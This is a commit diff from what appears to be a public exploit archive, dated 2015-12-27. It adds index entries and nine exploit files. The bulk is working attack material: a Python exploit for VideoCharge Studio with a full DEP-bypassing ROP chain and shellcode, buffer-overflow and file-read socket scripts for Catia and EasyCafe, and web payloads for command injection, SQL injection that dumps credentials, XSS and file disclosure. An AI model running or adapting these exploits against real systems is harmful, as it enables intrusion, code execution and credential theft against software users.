DB: 2015-12-27

9 new exploits

files.csv

@@ -35334,6 +35334,8 @@ id,file,description,date,author,platform,type,port
 39072,platforms/win64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win64,dos,0
 39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/reboot.cgi Unauthenticated Remote Reboot DoS",2014-02-03,"Josue Rojas",cgi,dos,0
 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
+39105,platforms/windows/remote/39105.py,"VideoCharge Studio 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow Vulnerability",2014-02-19,"Julien Ahrens",windows,remote,0
+39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia Stack Buffer Overflow Vulnerability",2014-02-19,"Mohamed Shetta",multiple,remote,0
 39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
 39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
 39078,platforms/php/webapps/39078.txt,"Web Video Streamer Multiple Security Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0
@@ -35351,6 +35353,13 @@ id,file,description,date,author,platform,type,port
 39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload Vulnerability",2014-02-05,"TUNISIAN CYBER",php,webapps,0
 39091,platforms/php/webapps/39091.pl,"WHMCS 'cart.php' Denial of Service Vulnerability",2014-02-07,Amir,php,webapps,0
 39092,platforms/php/webapps/39092.pl,"phpBB <= 3.0.8 Remote Denial of Service Vulnerability",2014-02-11,Amir,php,webapps,0
+39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
 39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
+39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0
+39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0
+39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0
+39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection Vulnerability",2014-02-26,"Anthony BAUBE",php,webapps,0
+39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection Vulnerability",2014-03-04,anonymous,php,webapps,0
+39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection Vulnerability",2014-03-05,Slotleet,php,webapps,0

platforms/asp/webapps/39106.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/65740/info
+
+eshtery CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 
+
+ http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp 

platforms/multiple/remote/39104.py

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/65675/info
+
+Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+Catia V5-6R2013 is vulnerable. 
+
+#!/usr/bin/env python
+   
+import socket
+import struct
+import ctypes
+ 
+RetAdd="\x90\x90\x90\x90"
+Shell="S" *1000
+buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.0.3", 55555))
+#s.connect(("192.168.0.5", 55558))
+s.send(struct.pack('>I',len(buff) ))
+s.send(buff)
+buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell                                   
+s.send(struct.pack('>I',len(buff) ))
+s.send(buff)

platforms/php/webapps/39093.txt

@@ -0,0 +1,27 @@
+================================================================================
+# Beezfud Remote Code Execution
+================================================================================
+# Vendor Homepage: https://github.com/EVA-01/beezfud
+# Date: 23/12/2015
+# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
+================================================================================
+# Vulnerable File : index.php
+
+# PoC :
+
+http://localhost/beezfud/index.php?parameter=;Command;
+
+Vulnerable Parameters : lookback , max , range , latest , earliest
+
+
+Example :
+
+http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
+?>' >info.php;
+
+================================================================================
+# Discovered By : Ehsan Hosseini (EhsanSec.ir)
+================================================================================

platforms/php/webapps/39107.txt

@@ -0,0 +1,83 @@
+source: http://www.securityfocus.com/bid/65744/info
+
+ATutor is prone to multiple cross-site scripting vulnerabilities and a HTML-injection vulnerability.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+ATutor 2.1.1 is vulnerable; other versions may also be affected. 
+
+1. During installation: xss and sql insertion:
+
+---<request>---
+POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 191
+
+action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
+---<request>---
+
+
+---<response>---
+<ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully.
+---<response>---
+
+--> tb_prefix and new_version parameter are also vulnerable.
+
+
+# ==============================================================
+# 2. XSS
+
+---<request>---
+POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 667
+
+action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB
+
+---<request>---
+
+Vulnerable to XSS are also parameters:
+step2%5Bnew_version%5D
+step2%5Bdb_host%5D
+step2%5Bdb_port%5D
+step2%5Bdb_login%5D
+step2%5Bdb_password%5D
+step2%5Bdb_name%5D
+step2%5Btb_prefix%5D
+
+
+# ==============================================================
+# 3. Persistent XSS (from admin)
+
+---<request>---
+POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 108
+
+add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save
+---<request>---
+
+---<response>---
+<span class="required" title="Required Field">*</span><label
+for="title">Title</label><br />
+    <input type="text" name="title" size="40" id="title"
+value="'>"><body/onload=alert(9999)>" />
+  </div>
+---<response>---
+
+
+
+# ==============================================================
+# 4. Edit config (from admin user):
+
+---<request>---
+POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 946
+
+site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save
+---<request>---

platforms/php/webapps/39108.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/65817/info
+
+POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions prior to POSH 3.3.0 are vulnerable. 
+
+http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item
+%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23 

platforms/php/webapps/39109.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65960/info
+
+Relevanssi plugin for WordPress is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Versions prior to Relevanssi 3.3 are vulnerable. 
+
+http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi 

platforms/php/webapps/39110.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65969/info
+
+Cory Jobs Search is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cory Jobs Search 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/coryapps/jobsearch/admincp/city.php?cid=[MySQL Injection] 

platforms/windows/local/39102..py

@@ -0,0 +1,55 @@
+#!/usr/bin/python -w
+# Title : EasyCafe Server <= 2.2.14 Remote File Read
+# Date : 25/12/2015
+# Author : R-73eN
+# Tested on : Windows 7 Ultimate
+# Software Link : http://www.tinasoft.com/easycafe/
+# Download Link: http://www.tinasoft.com/Download/easysetup.exe
+# Vulnerable Versions : EasyCafe Server <= 2.2.14
+# EasyCafe Server has a feature to upload file from the server to a client.
+# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,
+# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
+# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,
+# and does not check if it has sent the UDP request which gives us full Read access to the system.
+#
+#EDB Note: Code my need some adjusting
+
+import socket
+#Banner
+banner = ""
+banner += "  ___        __        ____                 _    _  \n" 
+banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
+banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
+banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
+banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
+print banner
+
+
+
+IP = "192.168.43.36" # Target IP
+PORT = 831
+file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read
+
+
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((IP, PORT))
+file_to_read = "\x43" + file_to_read
+hex_value = ''.join(x.encode('hex') for x in file_to_read)
+fill = "\x00"
+end = "\x01\x00\x00\x00\x01"
+payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
+s.send(payload)
+s.settimeout(0)
+print "[+] Request Send Waiting for Response . . . [+]"
+
+try:
+	data = s.recv(261) # Get header
+	while data:
+		data = s.recv(2048)
+		print data
+		
+except Exception:
+	print "[+] https://www.infogen.al/ [+]"
+finally:			
+	s.close()

platforms/windows/remote/39105.py

@@ -0,0 +1,134 @@
+source: http://www.securityfocus.com/bid/65685/info
+
+VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
+
+Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.
+
+VideoCharge Studio 2.12.3.685 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/python
+# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse() 
+MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
+# Version:       v2.12.3.685
+# Date:          2014-02-18
+# Author:        Julien Ahrens (@MrTuxracer)
+# Homepage:      http://www.rcesecurity.com
+# Software Link: http://www.videocharge.com
+# Tested on:     Win7-GER (DEP enabled)
+#
+# Howto / Notes:
+# Since it's a MITM RCE you need to spoof the DNS Record for 
+www.videocharge.com in order to successfully exploit this vulnerability
+#
+ 
+from socket import *
+from struct import pack
+from time import sleep
+ 
+host = "192.168.0.1"
+port = 80
+ 
+s = socket(AF_INET, SOCK_STREAM)
+s.bind((host, port))
+s.listen(1)
+print "\n[+] Listening on %d ..." % port
+ 
+cl, addr = s.accept()
+print "[+] Connection accepted from %s" % addr[0]
+ 
+# Thanks Giuseppe D'Amore for the amazing shellcode
+# http://www.exploit-db.com/exploits/28996/
+shellcode = 
+("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
+ 
+junk0 = "\x90" * 1277
+junk1 = "\x90" * 1900
+nops="\x90" * 30
+jmpesp=pack('<L',0x102340e8) * 5 # jmp esp |  {PAGE_EXECUTE_READ} 
+[cc.dll]
+ 
+# jump to controlled memory
+eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN 
+[zlib1.dll]
+ 
+#
+# ROP registers structure:
+# EBP - VirtualProtect() call
+# ESP - lpAddress
+# EBX - dwSize
+# EDX - flNewProtect
+# ECX - lpflOldProtect
+#
+ 
+# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] 
+and MOV to EBP
+rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
+rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
+rop += pack('<L',0xDE2D66F9) # XOR param 1
+rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
+rop += pack('<L',0xDEADBEEF) # XOR param 2
+rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # 
+RETN [cc.dll]
+rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll] 
+rop += pack('<L',0xDEADBEEF) # Filler
+rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
+ 
+# Craft VirtualProtect() dwSize in EAX and MOV to EBX
+rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
+rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
+rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]
+ 
+# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
+rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
+rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
+rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
+rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
+rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
+rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
+rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
+ 
+# Put writable offset for VirtualProtect() lpflOldProtect to ECX
+rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
+rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
+ 
+# POP a value from the stack after PUSHAD and POP value to ESI
+# as a preparation for the VirtualProtect() call
+rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
+rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
+rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
+rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
+ 
+# Achievement unlocked: PUSHAD
+rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
+rop += pack('<L',0x102340c5) # jmp esp |  {PAGE_EXECUTE_READ} [cc.dll]
+ 
+payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
+ 
+buffer = "HTTP/1.1 200 OK\r\n"
+buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
+buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with 
+Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
+buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
+buffer += "Vary: Accept-Encoding\r\n"
+buffer += "Content-Length: 4000\r\n"
+buffer += "Connection: close\r\n"
+buffer += "Content-Type: text/html\r\n\r\n"
+buffer += payload
+buffer += "\r\n"
+ 
+print cl.recv(1000)
+ 
+cl.send(buffer)
+ 
+print "[+] Sending exploit: OK\n"
+ 
+sleep(3)
+cl.close()
+s.close()